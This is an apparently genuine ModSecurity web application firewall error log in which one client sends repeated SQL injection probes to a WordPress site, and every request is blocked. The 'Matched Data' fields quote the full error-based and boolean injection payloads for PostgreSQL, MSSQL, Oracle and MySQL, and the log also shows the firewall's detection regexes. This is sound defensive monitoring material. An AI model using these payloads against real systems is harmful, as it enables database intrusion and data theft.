"(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: ' AND 1006=CAST((CHR(113)||CHR(120)||CHR(120)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (1006=1006) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(112)||CHR(113)||CHR(113)) AS NUMERIC) AND 'AOry'='AOry"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMqfn89YewL24c7_QPuwAAAEc"] [Sun Aug 18 00:54:49.860617 2024] [:error] [pid 26175:tid 140111182804736] [client 92.51.2.78:60692] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: %' AND 1006=CAST((CHR(113)||CHR(120)||CHR(120)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (1006=1006) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(112)||CHR(113)||CHR(113)) AS NUMERIC) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMqUusHEVNaz1QkYN6VAAAAME"] [Sun Aug 18 00:54:49.990390 2024] [:error] [pid 26175:tid 140111035467520] [client 92.51.2.78:60694] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: AND 1006=CAST((CHR(113)||CHR(120)||CHR(120)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (1006=1006) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(112)||CHR(113)||CHR(113)) AS NUMERIC)-- vSkU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMqUusHEVNaz1QkYN6VQAAAMo"] [Sun Aug 18 00:54:50.122880 2024] [:error] [pid 26175:tid 140111085823744] [client 92.51.2.78:60696] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:ver: ) AND 7914=CONVERT(INT,(SELECT CHAR(113) CHAR(120) CHAR(120) CHAR(98) CHAR(113) (SELECT (CASE WHEN (7914=7914) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(112) CHAR(112) CHAR(113) CHAR(113))) AND (9676=9676"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMqkusHEVNaz1QkYN6VgAAAMQ"] [Sun Aug 18 00:54:50.258994 2024] [:error] [pid 25550:tid 140110959933184] [client 92.51.2.78:60698] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:ver: AND 7914=CONVERT(INT,(SELECT CHAR(113) CHAR(120) CHAR(120) CHAR(98) CHAR(113) (SELECT (CASE WHEN (7914=7914) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(112) CHAR(112) CHAR(113) CHAR(113)))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMqvn89YewL24c7_QPvAAAAFM"] [Sun Aug 18 00:54:50.384540 2024] [:error] [pid 25549:tid 140110968325888] [client 92.51.2.78:60700] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:ver: ') AND 7914=CONVERT(INT,(SELECT CHAR(113) CHAR(120) CHAR(120) CHAR(98) CHAR(113) (SELECT (CASE WHEN (7914=7914) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(112) CHAR(112) CHAR(113) CHAR(113))) AND ('Jzqi'='Jzqi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMqpVyS4wZaDPTA77mOQAAABI"] [Sun Aug 18 00:54:50.690893 2024] [:error] [pid 26175:tid 140111060645632] [client 92.51.2.78:60702] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:ver: ' AND 7914=CONVERT(INT,(SELECT CHAR(113) CHAR(120) CHAR(120) CHAR(98) CHAR(113) (SELECT (CASE WHEN (7914=7914) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(112) CHAR(112) CHAR(113) CHAR(113))) AND 'LNqs'='LNqs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMqkusHEVNaz1QkYN6VwAAAMc"] [Sun Aug 18 00:54:51.016916 2024] [:error] [pid 25551:tid 140111085823744] [client 92.51.2.78:60704] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:ver: %' AND 7914=CONVERT(INT,(SELECT CHAR(113) CHAR(120) CHAR(120) CHAR(98) CHAR(113) (SELECT (CASE WHEN (7914=7914) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(112) CHAR(112) CHAR(113) CHAR(113))) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMqySCXpUXSc3dPnIU6gAAAIQ"] [Sun Aug 18 00:54:51.144560 2024] [:error] [pid 25551:tid 140110934755072] [client 92.51.2.78:60706] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:ver: AND 7914=CONVERT(INT,(SELECT CHAR(113) CHAR(120) CHAR(120) CHAR(98) CHAR(113) (SELECT (CASE WHEN (7914=7914) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(112) CHAR(112) CHAR(113) CHAR(113)))-- RLIM"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMqySCXpUXSc3dPnIU6wAAAJY"] [Sun Aug 18 00:54:51.654715 2024] [:error] [pid 25551:tid 140110976718592] [client 92.51.2.78:60708] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: ) AND 8359=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(120)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (8359=8359) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(112)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND (7102=7102"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMqySCXpUXSc3dPnIU7AAAAJE"] [Sun Aug 18 00:54:51.789397 2024] [:error] [pid 25551:tid 140110943147776] [client 92.51.2.78:60710] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: AND 8359=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(120)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (8359=8359) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(112)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMqySCXpUXSc3dPnIU7QAAAJU"] [Sun Aug 18 00:54:52.031402 2024] [:error] [pid 25551:tid 140111027074816] [client 92.51.2.78:60712] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: ') AND 8359=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(120)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (8359=8359) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(112)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND ('cqeI'='cqeI"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMrCSCXpUXSc3dPnIU7gAAAIs"] [Sun Aug 18 00:54:52.254499 2024] [:error] [pid 25551:tid 140111001896704] [client 92.51.2.78:60714] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: ' AND 8359=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(120)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (8359=8359) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(112)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND 'LiTk'='LiTk"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMrCSCXpUXSc3dPnIU7wAAAI4"] [Sun Aug 18 00:54:52.454241 2024] [:error] [pid 25551:tid 140110926362368] [client 92.51.2.78:60716] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: %' AND 8359=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(120)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (8359=8359) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(112)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMrCSCXpUXSc3dPnIU8AAAAJc"] [Sun Aug 18 00:54:52.733634 2024] [:error] [pid 25551:tid 140110959933184] [client 92.51.2.78:60718] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: AND 8359=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(120)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (8359=8359) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(112)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL)-- VVib"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMrCSCXpUXSc3dPnIU8QAAAJM"] [Sun Aug 18 00:54:53.230599 2024] [:error] [pid 26175:tid 140111069038336] [client 92.51.2.78:60720] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x7178786271 found within ARGS:ver: (SELECT 5554 FROM(SELECT COUNT(*),CONCAT(0x7178786271,(SELECT (ELT(5554=5554,1))),0x7170707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMrUusHEVNaz1QkYN6WAAAAMY"] [Sun Aug 18 00:54:53.590338 2024] [:error] [pid 26175:tid 140111077431040] [client 92.51.2.78:60722] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x7178786271 found within ARGS:ver: (SELECT CONCAT(0x7178786271,(SELECT (ELT(6119=6119,1))),0x7170707171))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMrUusHEVNaz1QkYN6WQAAAMU"] [Sun Aug 18 00:54:53.959890 2024] [:error] [pid 25551:tid 140111191197440] [client 92.51.2.78:60724] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: (SELECT (CHR(113)||CHR(120)||CHR(120)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (9411=9411) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(112)||CHR(113)||CHR(113)))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMrSSCXpUXSc3dPnIU8gAAAIA"] [Sun Aug 18 00:54:54.085437 2024] [:error] [pid 26175:tid 140110985111296] [client 92.51.2.78:60726] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CHAR( found within ARGS:ver: (SELECT CHAR(113) CHAR(120) CHAR(120) CHAR(98) CHAR(113) (SELECT (CASE WHEN (5971=5971) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(112) CHAR(112) CHAR(113) CHAR(113))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] 